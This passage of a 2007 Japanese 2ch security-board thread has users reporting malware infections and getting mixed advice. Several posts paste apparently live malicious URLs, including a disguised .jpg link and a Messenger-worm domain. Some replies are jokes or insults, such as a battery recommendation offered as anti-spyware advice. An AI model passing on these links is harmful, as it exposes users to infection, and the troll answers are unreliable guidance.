Mpackはもはや監視状態にあるから新たなモジュールが追加されたとしても、即情報が回ってくると思われ。
ただ同様のツールの開発も時間の問題だろうね。

この手のツールはセキュリティに関心のないmassをターゲットにしてるはずだから0-day exploit使う必要も技術もあまりないと思われる。
逆にものすごい注目をあびることとなり、コソドロ活動がやりにくくなるw しかし.aniの例もあるし絶対とは言い切れないね。
OSの0-day使われた場合 有効なのはアンチウイルスによる対応だね。あとEeyeあたりの3rd partyパッチもでるだろう。

確率の低い0-day心配するよりOSとブラウザ、アプリのアップデートを欠かさないってことの方が遥かに重要。

374 名前: ◆N9P3SuvBPo mailto:sage [2007/07/01(日) 19:50:01 ]
確率の低いだからこそ恐ろしいんだよな<0-Day
アンチウイルスの対応とは言っても、それがまだ対応してなかったらどうしようもないしな。

375 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/07/01(日) 20:21:10 ]
>>374
> 確率の低いだからこそ恐ろしいんだよな<0-Day

意味不明。

0-dayに対処する方法は該当する穴を塞ぐか、0-day exploit codeに対応したアンチウイルスで対処する以外の方法はない。

てか あんたはo-dayの心配よりPFWの勉強でもしときな。

376 名前: ◆N9P3SuvBPo mailto:sage [2007/07/01(日) 20:26:09 ]
>375
o-dayって何?
オー-デイって聞いた事ないんですけど〜

377 名前: ◆N9P3SuvBPo mailto:sage [2007/07/01(日) 20:29:23 ]
しかし俺も舐められたものだなw

378 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/07/01(日) 20:29:31 ]
失礼  訂正する。

あんたは0-dayの心配よりPFWの勉強でもしときな。

379 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/07/01(日) 20:34:28 ]
人の揚げ足を取るなんて、◆N9P3SuvBPoも落ちたものだな…

380 名前: ◆N9P3SuvBPo mailto:sage [2007/07/01(日) 20:39:03 ]
はぁ…セキュリティ意識ゼロとはこの事を言うんだな



381 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/07/01(日) 20:42:38 ]
煽りになってないよ

382 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/07/01(日) 20:47:20 ]
回ってみたり、転がってみたり、揚げ足を取ってみたり。

本当にどうしたんだ?、◆N9P3SuvBPoは…

383 名前:4 ◆NFQtmGW3bw mailto:sage [2007/07/01(日) 20:54:34 ]
スレ汚しスマソ
最近ウイルス感染者多いけど、セキュリティソフトは入れてますか?
俺みたいな最悪の場合になる前に、セキュリティソフトは入れたほうがいいですよ。

アダ被で気になるファイルがあったから送ってもらおうと思ったら怪しまれちゃったwww
怪しい者ではないんだがねwww

www30.atwiki.jp/virus2007jp/
自分のサイトです。
ウイルス駆除方法など教えますので、困ったことあったらいつでも来てください。

384 名前: ◆N9P3SuvBPo mailto:sage [2007/07/01(日) 20:56:10 ]
PFWを入れておけば、何があっても、どんなことをしても、絶対安全だと誓えるのなら、
復習してもいい。

385 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/07/01(日) 20:56:15 ]
こっち見たりもしてました><

386 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/07/01(日) 20:59:23 ]
> PFWを入れておけば、何があっても、どんなことをしても、絶対安全だと誓えるのなら、
> 復習してもいい。

わかった。復習しなくていい。ずっと無知でいなよ。

387 名前:386 mailto:sage [2007/07/01(日) 21:11:05 ]
ちと 言い過ぎたかも。

言いたかったのは無闇に心配を煽るのはよそうぜってこと。
そんだけ。

388 名前:4 ◆NFQtmGW3bw mailto:sage [2007/07/01(日) 21:11:18 ]
>>386
そんなこといってると、ウイルス入ってから泣きを見るぞwww


389 名前:4 ◆NFQtmGW3bw mailto:sage [2007/07/01(日) 21:12:04 ]
お、アンカー間違いスマソ
正しくは>>384です。
386すまない。

390 名前: ◆N9P3SuvBPo mailto:sage [2007/07/01(日) 21:18:08 ]
今までウイルスに掛かったことはない。
これからも掛かることはない。
ウイルスに掛かる前に寿命で逝くからだ。



391 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/07/01(日) 21:56:23 ]
>>390
(´・ω・) カワイソス

392 名前:名無しさん@お腹いっぱい。 [2007/07/02(月) 21:13:49 ]
これ見えないんですけど、ウィルスじゃないですよね
www.rupan.net/uploader/download/1183323816.jpg


393 名前:名無しさん@お腹いっぱい。 [2007/07/03(火) 00:28:50 ]
これはどういったウイルスなんでしょうか?
suzukiairi.net/cgi-bin/up/img/puniairi150.jpg

394 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/07/03(火) 00:55:30 ]
>>392-393
スレ違い、誘導
勇気がなくて踏めない人のための鑑定スレPart14
pc11.2ch.net/test/read.cgi/hack/1177503872/

395 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/07/03(火) 00:56:34 ]
>>393
セキュリティ板 初心者質問スレッドpart91
pc11.2ch.net/test/read.cgi/sec/1182048552/795

795 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2007/07/02(月) 22:37:17
↓これウイルスらしいのですが、踏んでしまいました。踏んだらやばいのでしょうか・・・
suzukiairi.net/cgi-bin/up/img/puniairi150.jpg

396 名前:名無しさん@お腹いっぱい。 [2007/07/03(火) 07:50:54 ]
スパイウェアーがたくさん見つかりました。
どう対処したらいいかわかりません。
対処方法手順を教えてください!

397 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/07/03(火) 08:14:58 ]
>>396
アンチスパイウェアで駆除

398 名前:sage mailto:397 [2007/07/03(火) 09:59:57 ]
アンチはどこで手に入りますか?

399 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/07/03(火) 10:46:07 ]
>>398
コンビニ

400 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/07/03(火) 11:15:58 ]
ありがとうございます。いくらぐらいですか?
完全に直りますか?



401 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/07/03(火) 13:48:10 ]
>>400
panasonicのアルカリ製がおすすめ。
マンガンは話にならん。

402 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/07/03(火) 17:33:59 ]
>>400
ぐぐれかす

403 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/07/03(火) 17:52:38 ]
そう、ひがまないでくださいよ〜かわいそうな子

404 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/07/03(火) 18:16:40 ]
>>401
ごめんよ。 誰もつっこまないで。

405 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/07/03(火) 18:58:56 ]
>>396 スパイウェアを見つけたソフトで削除。
見つけたといってるソフトの名前にWIN、Doctorがついてたらそちらの方を削除。

406 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/07/03(火) 19:36:36 ]
プロバイダーがOCNなのですが、OCNのウィルスクリアーで駆除出来るでしょうか?

407 名前:名無しさん@お腹いっぱい。 [2007/07/03(火) 20:42:10 ]
DAMEっていうウィルスに感染したみたいなのですが、これって削除さえすれば大丈夫なものでしょうか?

408 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/07/03(火) 20:51:40 ]
DAME

409 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/07/03(火) 21:43:05 ]
ソフォス、2007年6月の『ウイルス傾向レポート』を発表
www.sophos.co.jp/pressoffice/news/articles/2007/07/toptenjun07.html

2007年6月におけるWebウイルストップ10

チャートの1位に挙がったIframeは、Webサイトの脆弱性をついて悪質なプログラムをサイト上に埋め込むマルウェアですが、
引き続き大規模な感染を見せ、6月に発見されたWebウイルスのほぼ3分の2を占めています
Iframeなどの悪質なプログラムは、無防備なユーザーがサーフィング中に訪れるのを待っているように見受けられます。
Webサイトは高度なセキュリティ環境で堅牢に運営されるべきですが、実際には多くのサイトがあまりにも無防備なまま使用されているのが現状です。

Webウイルスホスティングサイトトップ10(国別)

今月も中国がチャートのトップに立ちました。
イタリアが初めてチャートインした原因として、Iframeのほか、Webウイルスチャートの2位に挙がっているObfJSによる感染があります。
ObfJSも6月前半に、多くの正規サイトをハッキングして被害を広げました。

410 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/07/03(火) 23:48:44 ]
【使用OS】 「WinXPsp2」
【Microsoft Update(MU)の状態】 「Auto」 
【使用セキュリティソフトとバージョン】 「Norton internet security 2006」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「Yesssssssss!!!!!!!!」 
【スパイウェア対策ソフト】 「無し」 
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「」
【ルータの有無】 「BBR-4HG」

【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
「特になし」
スキャンした結果ではないが、C:\直下にDBI.EXEとmoduleName.txtの見知らぬファイルが存在。

【どんな症状が出るか】 「所見無し」
【症状が出る前に何をやったか】 「」
【症状を解決しようとどのような処置を取ったか】 「ad-awareにてスキャン/NISにてスキャン」
【その他の質問】 「DBI.EXEをぐぐると、malwareらしい記載発見。」
DBI.exeのプロパティを開くと、DOSプログラムへのショートカットが作成されます。
これらに見覚えがないのですが、削除してもいいものでしょうか。




411 名前:名無しさん@お腹いっぱい。 [2007/07/04(水) 02:39:25 ]
Backdoor.PHP.C99Shell.a
ってウィルスがカスペで検出されました

調べてもよくわかりません。どんな悪さをするんですか??

412 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/07/04(水) 02:40:54 ]
Backdoor

413 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/07/04(水) 02:51:54 ]
>>411
多分>>276踏んだんだろ
>>278

414 名前:412 [2007/07/04(水) 10:04:09 ]
>>412
>>276の画像がどういうのかは分からないのですが
一度白人女性の画像を踏んで感染→削除って作業はした事があります。

Backdoorについて曖昧にしかりかいしていませんが
"ユーザーに気付かれないうちに進入してリモートが出来る"
"勝手にpc内のファイルを自由に操作or流出出来る"
で合ってますか?

問題は感染はしたけれど、リモートされたかが分かりません。
PHPを入れたって言うのは要はPHPを書くためにエディター?をインストールしたか?
という事ですか?

415 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/07/04(水) 11:58:14 ]
そもそも何を持って「感染した」と判断したのかな
キャッシュに残っていただけじゃないのか?検出箇所書かないと

>>1も埋められないようならリカバリなり再インストールなり好きにしなさい

416 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/07/04(水) 12:12:19 ]
【使用OS】 windows 2000 SP4free
【Microsoft Update(MU)の状態】 更新しない設定
【使用セキュリティソフトとバージョン】 なし
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 ない
【スパイウェア対策ソフト】 なし(ルーター付属のオンラインウィルススキャン)
【スパイウェア対策ソフトの更新は定期的に行なっているか】 行ってない
【ルータの有無】 有

【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
カスペルスキー オンラインスキャナ レポート
C:\WINNT\system32\KB11505076.exe 感染: Rootkit.Win32.Agent.ea スキップ
C:\WINNT\system32\KB96926207.exe 感染: Rootkit.Win32.Agent.ea スキップ

【どんな症状が出るか】 ログイン画面が出ると再起動され、繰り返される。
【症状が出る前に何をやったか】 インターネットでサイト見てたら突然インターネット接続のヘルプが出て直後再起動が始まった。
【症状を解決しようとどのような処置を取ったか】 
ルーターに付属のウィルススキャンを行ってトロイ7つを削除した。
Windows Update を試行したが出来なかった。
 Windows Update を使用するために必要なファイルがコンピュータに登録されていないか、
 インストールされていません。続行するには、次の手順を実行してください。と出て、
 今すぐファイルを登録または再インストールする (推奨)
 を選んでダウンロードが始まるのですが、updateが利用できなかった。

【その他の質問】 
原因がよくわからず、他に手だてが
ありましたら教えてください。
よろしくお願いします。

417 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/07/04(水) 12:55:23 ]
>原因がよくわからず、他に手だてが

  原因はおまえの頭 !

418 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/07/04(水) 13:02:59 ]
>>416
すいません。

416の追記です。
ブラスターの感染はなく、ケーブルをつないで
インターネットに接続すると再起動が始まってしまいます。

419 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/07/04(水) 13:03:37 ]
【使用セキュリティソフトとバージョン】 なし

帰れ

420 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/07/04(水) 13:16:03 ]
>>416
> 【使用OS】 windows 2000 SP4free

ワレザ帰れ



421 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/07/04(水) 13:17:37 ]
フリーのセキュリティーソフトはおまいには無理そうだから
2000で使えるソフトを買ってきて、潔くOSクリーンインストール。

422 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/07/04(水) 13:24:38 ]
下手にでれば調子に乗りやがって、糞が!

423 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/07/04(水) 13:51:17 ]
糞はどっちだ ! !

424 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/07/04(水) 13:59:20 ]
〜〜〜いじめられっ子逆ギレの巻〜〜〜

425 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/07/04(水) 14:02:59 ]
いじめられっこがキレるのは逆ギレじゃないだろ…
この場合は泥棒が切れてるだけだし

426 名前:名無しさん@お腹いっぱい。 [2007/07/04(水) 16:06:05 ]
URLの後ろにjpg.ってかいてあるウィルスあるんですか?

427 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/07/04(水) 16:24:31 ]
いっぱいあるよ

428 名前:851 [2007/07/04(水) 16:33:49 ]
>>852
suzukiairi.net/cgi-bin/up/img/puniairi150.jpg
これ大丈夫でしょうか。なんですか、これ?

429 名前:永久永遠に続く天国 [2007/07/04(水) 16:37:02 ]
パソコン画面の右下で ウイルスバスター(の図) をクリックして
終了 としてしまいました。
それから (ウイルスバスターの図が)右下の画面に出てきません
どうしたら(ウイルスバスター(の図)を)復活できるのでしょうか?

430 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/07/04(水) 16:40:48 ]
>>428
sakuratan.ddo.jp/imgboard/img-box/img20070704163014.jpg



431 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/07/04(水) 16:42:02 ]
>>429
多重まるち

432 名前:永久永遠に続く天国 [2007/07/04(水) 18:12:01 ]
解決しました

433 名前:853 [2007/07/04(水) 18:20:37 ]
どうなんでしょうか

434 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/07/04(水) 18:21:17 ]
>>433
なにがでしょう?

435 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/07/04(水) 18:50:12 ]
突然すいません、スパイウェアをほっとくとどういった事になってしまいますか?

436 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/07/04(水) 18:53:53 ]
ある日見覚えの無い借金の催促が…

437 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/07/04(水) 19:40:18 ]
別に見覚えの無いことほっといても問題ないですよね?
スパイウェアはパソコンには支障ないですか?

438 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/07/04(水) 20:39:15 ]
プロパイダからお叱りのメールが来るようになる

439 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/07/04(水) 20:52:02 ]
ttp://www.subculture.com/backdoor.html

このHPはウイルスつきでしょうか。詳しい方教えてください。
詳しい方以外は絶対踏まないほうがいいです。

440 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/07/04(水) 21:02:03 ]
>>437
パソコンには支障ないけど実生活に支障が出る。

あなたの見たサイトの履歴が誰かに知られる、
覚えがなくても正当な借金が出来たり(クレジット番号漏出)とか。



441 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/07/04(水) 21:09:48 ]
>>439
なんの問題も無い

442 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/07/04(水) 21:21:57 ]
>>437
そろそろ請求される頃かな・・・

443 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/07/04(水) 23:27:08 ]
>>433-434
この流れワロスw

444 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/07/04(水) 23:33:48 ]
何のクレジットでもバレるんですか!?

知らない間に借金はかなり恐ろしいですね…

ウィルスよりは質がいいんでしょうか?

445 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/07/05(木) 00:01:20 ]
【使用OS】 「WinXPsp2」
【Microsoft Update(MU)の状態】 「Auto」 
【使用セキュリティソフトとバージョン】 「ウイルスバスター2007」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「最新」
【スパイウェア対策ソフト】 「無し」 
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「はい」
【ルータの有無】 「有」

【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
「特になし」

【どんな症状が出るか】 「ウイルス検索をかけると「BMPファイルオープンに失敗しました」という大量の小窓。それを全部消すと、「Hello!」という小窓がでる」
【症状が出る前に何をやったか】 「サイト閲覧中」
【症状を解決しようとどのような処置を取ったか】 
ウイルスバスターでスキャン
BitDefender Online Scannerでスキャン
a-squared Freeでスキャン

【その他の質問】 
サイト閲覧中にJS_DLOADER.NUFが検出されました。
慌ててしまってキャッシュをCCleanerで咄嗟に削除してみたのですが、どうにも不安で……
何でスキャンしても症状がでましたが、a-squared Freeで検出されたものを
削除してみたら小窓の数が2つになり、Helloもなくなりました。

446 名前:名無しさん@お腹いっぱい。 [2007/07/05(木) 00:47:36 ]
メッセンジャー使用中、メンバーに対して自動で無差別に
Here are my very secret pictures for you.
というメッセージと共にmyalbum2007.zipというファイルを送信してしまうですが。
中身はphoto album-2007.scrでした。まあ、ウイルスソフトが削除してしまって、解凍はできないようですが。
同じ症状の方、又は対処方法知ってる方助けてください・。・

447 名前:名無しさん@お腹いっぱい。 [2007/07/05(木) 01:08:43 ]
yahoo動画や、その他の動画(ようつべやニコニコは観れる)が
突然観れなくなったんだけどウィルスの可能性あるかな?
突然っていうのは今日の朝まで見れてたんだけど夜帰ってきて観ようと思ったら
観れんかった。
もちろんその間設定等全くいじってないから原因が全くわからん。

448 名前:名無しさん@お腹いっぱい。 [2007/07/05(木) 01:54:25 ]
あの、なぜかスルーされてるんですけど、なぜでしょう。
ウィルスだとおもうんですが、どうしたらよいでしょうか。
suzukiairi.net/cgi-bin/up/img/puniairi150.jpg

449 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/07/05(木) 06:19:28 ]
>>448
>あの、なぜかスルーされてるんですけど、なぜでしょう。
誰ですか、あなたは?どのレス番の人でしょうか

>ウィルスだとおもうんですが、
そうですね、ウイルスですね。このスレだけでも>>276で既に出ていますね

>どうしたらよいでしょうか。
>>278でよいでしょう
不安ならリカバリなり再インストールなりするとなおよいでしょう

450 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/07/05(木) 10:40:19 ]
>>444
おまいは強盗よりはマシだからといって、こそ泥を家においておくのか



451 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/07/05(木) 11:52:04 ]
>>450
では、撃退しますか!!やり方よく解りませんが。

452 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/07/05(木) 12:50:26 ]
>>441
ありがとうございます。
ちなみに何のサイトなのか教えてくれませんか?

453 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/07/05(木) 13:53:42 ]
>>452
LOVE-LETTER-FOR-YOU.TXT

454 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/07/05(木) 16:26:36 ]
>>446
photo album-2007.scrでぐぐると結構ヒットするね
中国語サイトばっかでいまいちよくわからんが


Backdoor.IRCBot.ACD
ttp://www.k7computing.com/virusdetails.asp?virusid=46316

↑この辺が症状近そうだけど自分のマシンと見比べてみて
一致するようならこれの手順に従って退治

455 名前:名無しさん@お腹いっぱい。 [2007/07/05(木) 17:17:54 ]
うっかりしてNortonを無効のままにしておいたらウィルスに感染されて
しまいました。国分太一の「支点・力点・作用点」っていう声が続いて
います。対処法はありませんか?

456 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/07/05(木) 18:14:28 ]
>>455
ウィルス・スパイウェアのスキャンをしてから出直してこい。

457 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/07/05(木) 22:48:00 ]
MPack Clearance Sale!
www.symantec.com/enterprise/security_response/weblog/2007/07/mpack_clearance_sale.html

458 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/07/05(木) 23:36:52 ]
すみません。質問ですがマイドキュメントやマイネットワークなどが変なアイコンに変わったんですが
何か原因がありますか?パソコンのスクリーンセーバーいじってたんですけど。
マイネットワークはほかのほかのコンピューターのフォルダにアクセルしたりとか
書かれています。ウィルス検索しても何も見つかりませんが。
どなたか教えてください。
全体的に薄く青くなってしまったのですが


459 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/07/05(木) 23:42:41 ]
> マイネットワークはほかのほかのコンピューターのフォルダにアクセルしたりとか

どう見ても釣りです、本当に(ry

460 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/07/05(木) 23:47:20 ]
>>458
何も見つからなかったなら大丈夫でしょ
そのスキャンに使用したものが何だかわからんが



461 名前:名無しさん@お腹いっぱい。 [2007/07/05(木) 23:48:05 ]
>>454 ありがとうございます!
早速試してみます。

462 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/07/06(金) 02:32:06 ]
MSNメッセンジャー使用中
「URL張っても理由聞かないでください」っていう名前に変えた友人から
URLはられファイルをDLしてしまい
どうやら感染したようです


同じような被害にあわれた方いますか?
どのようなウイルスでどのように対処したか
お教えください

463 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/07/06(金) 02:47:50 ]
>>462
質問用テンプレを使って書き直してくれ。

あと、そのURLは分からないか?

464 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/07/06(金) 02:52:39 ]
>>462
ダウンロードしたフォルダを調べてみる。
感染したかもと思ったら、「ウイルススキャンを実行する!」

465 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/07/06(金) 02:54:26 ]
セキュリティ板 初心者質問スレッドpart91
pc11.2ch.net/test/read.cgi/sec/1182048552/918

918 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2007/07/06(金) 02:31:32
ウイルスに盗まれた個人情報が“丸見え”、誰でもアクセス可能に

ttp://itpro.nikkeibp.co.jp/article/NEWS/20070628/276166/?ST=security


Webサイトのアドレスさえ分かれば、ウイルスが盗んだパスワードなどを、誰でも閲覧できる状態になっていた。
Webサイトには、ウイルスが感染したパソコンのマシン名(ホスト名)/ユーザー名(アカウント)ごとにディレクトリが用意されている(図1)。
そしてそのディレクトリの下には、そのパソコンからウイルスが盗んだ銀行の口座情報のほか、Yahoo!やMSNのアカウント(ユーザーIDとパスワード)、
やり取りされたメールの内容などを記述したHTMLファイルが置かれている(図2)。同社スタッフによれば、盗まれたパスワードなどは現在も有効で、
変更されていないだろうという。



466 名前:462 mailto:sage [2007/07/06(金) 04:39:22 ]
>>463
焦っていて1すら読んでませんでした
申し訳ないです

【使用OS】 「XP」
【使用セキュリティソフトとバージョン】 avastアンインストールしカスペルの試用版
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「はい」 
【スパイウェア対策ソフト】 「なし」 
【ルータの有無】 「あり」

【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
「すべて削除、除去してしまいわかりません」

【どんな症状が出るか】 
どうやら感染したことにより、メッセンジャーで勝手に友達登録した人に
URLを送っているようです
【症状が出る前に何をやったか】 
友人から送られてきたファイルDL、起動
【症状を解決しようとどのような処置を取ったか】 「カスペルスキー完全スキャン」

これがURLです
ttp://7961.ruikinyunhfenduansterdin.com/3128/
*ウイルスです*

467 名前:462 mailto:sage [2007/07/06(金) 04:42:35 ]
追記です
スカイプを起動したら
あまり覚えていないのですが
「sk.exeを使い通信しますか?」
のような注意が出てきました


468 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/07/06(金) 07:26:14 ]
>>466
ダウンロードした、check.exeを実行した結果がこれ。

ファイル
C:\WINDOWS\System32\kbdemsdm.dll
C:\WINDOWS\System32\kbdemsdm.exe

レジストリ
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\kbdemsdm]
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Session Manager] "PendingFileRenameOperations"
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager] "PendingFileRenameOperations"

sk.exeを調べたら、Warezov/Strationと言うウイルスらしい。

469 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/07/06(金) 11:40:50 ]
>>462
ハックされてるかも
IMを使うときは注意しないと
パスワードを変えて、ウィルス、スパイウェアのスキャンを推奨

470 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/07/06(金) 19:05:34 ]
駆除して、再起動するとまたセキュリティーに隔離されるウィルスがあるんだけど、ナニコレ?
セキュリティーソフト
「ウィルスセキュリティー0」
OS
「ウィンドウズXP」隔離されるファイル名
「b.exe」
隔離前の場所
「C\WINDOWS」
説明欄
「Backdoor.Win32.EggDrop」

どういったウィルスで、完全に消し去るにはどうすればよいですか?



471 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/07/06(金) 20:00:12 ]
リカバリ

472 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/07/06(金) 20:02:09 ]
別のソフトでスキャンする。

473 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/07/06(金) 20:25:03 ]
ウイルスバスターでは検知されなかったのですが
avastで検査したら、ウイルス項目に出てきました。
これって何でしょうか?
C:\Program Files\Common Files\Microsoft Shared\MSInfo\zhnzvenn.drv
C:\System Volume Information\_restore{C82133B7-C855-45B3-B6FE-E36E8C3BFFE}\RP125\A002587.sys
C:\System Volume Information\_restore{C82133B7-C855-45B3-B6FE-E36E8C3BFFE}\RP140\A003645.drv
C:\System Volume Information\_restore{C82133B7-C855-45B3-B6FE-E36E8C3BFFE}\RP92\A002029.ime

474 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/07/06(金) 20:28:56 ]
rootkit

475 名前: ◆N9P3SuvBPo mailto:sage [2007/07/06(金) 20:52:18 ]
>473
>C:\Program Files\Common Files\Microsoft Shared\MSInfo\zhnzvenn.drv

>>Microsoft Shared
この手の名前を使う奴は、まさしく中華系トロイ
さらに>474の言ってるRootkitも入ってる可能性あり
つ「RootkitBuster」

>C:\System Volume Information\_restore
これについては自分の力で(ググったりして)

476 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/07/06(金) 21:51:10 ]
473です。
avastでチェストに移動したのですが
それでけではダメでしょうか?
何度もすみません

477 名前:名無しさん@お腹いっぱい。 [2007/07/06(金) 21:54:46 ]
変なexeファイルを踏んでしまい、
「処理に必要な DSKMAINT.DLL ファイルが見つからないか、このファイルにアクセスできませんでした。」
というダイアログがでて、デスクトップのアイコンがほとんどなくなり、日本語が一部表示されなくなったりしています。
セーフモードも起動できません。

いったいこれは何なんでしょうか。対処法などお教え下さい。よろしくお願いします。

478 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/07/06(金) 21:57:14 ]
リカバリ

479 名前:名無しさん@お腹いっぱい。 [2007/07/06(金) 22:09:13 ]
出来ればリカバリしたいのですが、HDDの中身をできるだけ守りたいのです。HDDの中身を吸い出す方法はありますか?

480 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/07/06(金) 22:14:44 ]
どこに有るか解からんものを、おまいが避けられると思えないが ?



481 名前:名無しさん@お腹いっぱい。 [2007/07/06(金) 22:28:34 ]
>>480
仰っている意味がよく分からないんですが・・・

482 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/07/06(金) 22:31:36 ]
>>481
ウイルスが何処に有るのか分からない、と言いたいんじゃないか?

つまり、バックアップするファイルが感染している可能性が有ると言うこと。

483 名前:名無しさん@お腹いっぱい。 [2007/07/06(金) 22:41:58 ]
>>482
dです。
確かにそうですね・・・。ただ、レジストリが書き換えられているだけのような感じでしたし、
バックアップしたいデータには無いとは思うんですがねぇ・・・

一応聞いてみてますが、そういうPCのHDDからデータを吸い出す方法はあるんですか?

484 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/07/06(金) 22:47:50 ]
>>483
HDDを外して、別のPCでバックアップする。

LinuxのブータブルCDを使って、外部記憶媒体に保存する。

485 名前:名無しさん@お腹いっぱい。 [2007/07/06(金) 22:49:59 ]
>>484
ありがとうございます。試してみます

486 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/07/06(金) 23:04:05 ]
>>476
再度、スキャンして検出されなければ問題ない。

不安なら他のソフトでスキャンすればいい。

487 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/07/06(金) 23:17:54 ]
どのソフトがいいんでしょうか?

488 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/07/06(金) 23:22:32 ]
>>487
非常中でBitDefenderがお勧め

489 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/07/06(金) 23:23:02 ]
>>487
a-squared Free
ttp://www.emsisoft.jp/jp/

Dr.Web CureIt!
ttp://drweb.jp/support/?cureit

490 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/07/06(金) 23:27:43 ]





491 名前:愛タンバックアップ中..... mailto:sage [2007/07/07(土) 02:07:48 ]
やっぱ眠い人が居なきゃ駄目だなと思った

492 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/07/07(土) 06:28:39 ]
常駐のアンチウィルス入れてる状態でオンラインウィルススキャンとかやっても問題ない?


493 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/07/07(土) 13:00:09 ]
ない


494 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/07/10(火) 23:24:55 ]
もうどにもならないかもorz

【使用OS】 「XP」
【使用セキュリティソフトとバージョン】 「AnnLabV3 VirusBlock2007」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「更新しました」 
【スパイウェア対策ソフト】 「なし」 
【ルータの有無】 「なし」

【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
「もう駆除してしまい正式名称は控えてなかったのですがトロイの一種、そして駆除後も症状は治らず」

【どんな症状が出るか】 
「エクスプローラーにおいてF5連打(常時更新)状態
あとたまに立ち上げようとするとピーピーとうるさい音が鳴ることがある(どうしようもないので強制終了してます)」
